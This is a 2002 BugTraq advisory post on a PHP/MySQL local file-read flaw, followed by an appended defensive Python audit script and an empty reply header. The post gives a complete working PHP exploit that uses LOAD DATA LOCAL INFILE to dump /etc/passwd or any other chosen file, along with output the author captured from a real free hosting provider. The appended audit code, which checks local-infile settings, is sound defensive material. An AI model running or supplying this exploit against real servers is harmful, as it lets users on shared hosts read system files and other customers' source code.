BugTraq
File reading vulnerable in PHP and MySQL (Local Exploit)
Nov 26 2002 10:57AM
Hai Nam Luke (hainamluke hotmail com)
(1 replies)
An attacker can use PHP and MySQL to read some local files in the following way:
# Create a database (MySQL) and upload this file to your server
PHP Code: viewfile.php (programmed by Luke)
======================================================
<?
// config this data
$dbhost = "";
$dbuser = "";
$dbpasswd = "";
$dbname = "";
$file = "/etc/passwd"; // filename that you wanna view
// shell code
echo "<pre>";
mysql_connect ($dbhost, $dbuser, $dbpasswd);
$sql = array (
    "USE $dbname",
    'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
    "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
    . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
    . "ESCAPED BY '' "
    . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
    "SELECT a FROM $tbl LIMIT 1"
);
foreach ($sql as $statement) {
    $query = mysql_query ($statement);
    if ($query == false) die (
        "FAILED: " . $statement . "\n" .
        "REASON: " . mysql_error () . "\n"
    );
    if (! $r = @mysql_fetch_array ($query, MYSQL_NUM)) continue;
    echo htmlspecialchars($r[0]);
    mysql_free_result ($query);
}
echo "</pre>";
?>
======================================================
You'll receive all the source of /etc/passwd.
This vulnerability is very dangerous because a user can read some important
files on your server. Especially, on any free host, a user can use the local
exploit to read the source code of other users and attack one another.
Example: I uploaded this file and configured it at http://members.lycos.co.uk/ and I
received their file "/proc/cpuinfo":
==============================================================
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 8
model name : Pentium III (Coppermine)
stepping : 10
cpu MHz : 997.531
cache size : 256 KB
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 2
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse
bogomips : 1992.29
processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 8
model name : Pentium III (Coppermine)
stepping : 10
cpu MHz : 997.531
cache size : 256 KB
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 2
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse
bogomips : 1992.29
==============================================================
And many other files, please check your server!
Thanks to dodo. Sorry for my poor English!
Luke (HVA)
http://www.hackervn.net
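A configuration check for the exposure described in the post above, as an added example that is not part of the original post. With LOCAL the file is read by the MySQL client library inside the PHP process, so the audit covers both the server's `local-infile` option and the `allow_local_infile` directives that later PHP releases provide for the mysql/mysqli extensions; the function names and sample config texts are constructed for illustration.

```python
import re

OFF = {"0", "off", "false", "no"}       # spellings that disable a boolean option
SERVER_GROUPS = {"mysqld", "server"}    # option-file groups the server reads

def mysql_local_infile(cnf_text):
    """Return 'on', 'off' or 'unset' for the server's local-infile option."""
    state, group = "unset", None
    for raw in cnf_text.splitlines():
        line = raw.split("#", 1)[0].strip()          # '#' may start mid-line
        if line.startswith("["):
            group = line.strip("[] ").lower()
            continue
        if not line or line.startswith(";") or group not in SERVER_GROUPS:
            continue
        key, _, val = (p.strip().lower() for p in line.partition("="))
        key = re.sub(r"^loose-", "", key.replace("_", "-"))
        if key in ("skip-local-infile", "disable-local-infile"):
            state = "off"
        elif key in ("local-infile", "enable-local-infile"):
            state = "off" if val in OFF else "on"    # bare option means on
    return state                                     # the last setting wins

def php_local_infile(ini_text):
    """Map each *.allow_local_infile directive in php.ini to 'on' or 'off'."""
    found = {}
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()          # ';' starts a comment
        m = re.fullmatch(r'(mysqli?\.allow_local_infile)\s*=\s*"?(\w*)"?', line, re.I)
        if m:
            found[m.group(1).lower()] = "off" if m.group(2).lower() in OFF | {""} else "on"
    return found

def audit(cnf_text, ini_text):
    """List settings that do not explicitly disable LOAD DATA LOCAL INFILE."""
    php = php_local_infile(ini_text)
    seen = {"[mysqld] local-infile": mysql_local_infile(cnf_text),
            "mysql.allow_local_infile": php.get("mysql.allow_local_infile", "unset"),
            "mysqli.allow_local_infile": php.get("mysqli.allow_local_infile", "unset")}
    # 'unset' is reported too: the default then depends on the installed version.
    return [f"{name} is {state}" for name, state in seen.items() if state != "off"]

# Constructed sample files (assumptions for illustration, not from a real host).
WEAK_CNF = "[client]\nlocal-infile=0\n[mysqld]\nport=3306\nlocal_infile   # bare option\n"
HARD_CNF = "[mysqld]\nlocal-infile=1\nloose-local-infile = OFF\n"
WEAK_INI = "mysqli.allow_local_infile = On ; default in older PHP\n"
HARD_INI = "mysql.allow_local_infile = Off\nmysqli.allow_local_infile = 0\n"
if __name__ == "__main__":
    print(audit(WEAK_CNF, WEAK_INI), audit(HARD_CNF, HARD_INI))
```

An empty list means every audited setting explicitly disables LOCAL INFILE; a `local-infile=0` under `[client]` alone, as in the weak sample, does not change what the server accepts.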
Re: File reading vulnerable in PHP and MySQL (Local Exploit)
Nov 27 2002 09:54AM
Dave Wilson (dw botanicus net)
Copyright 2010, SecurityFocus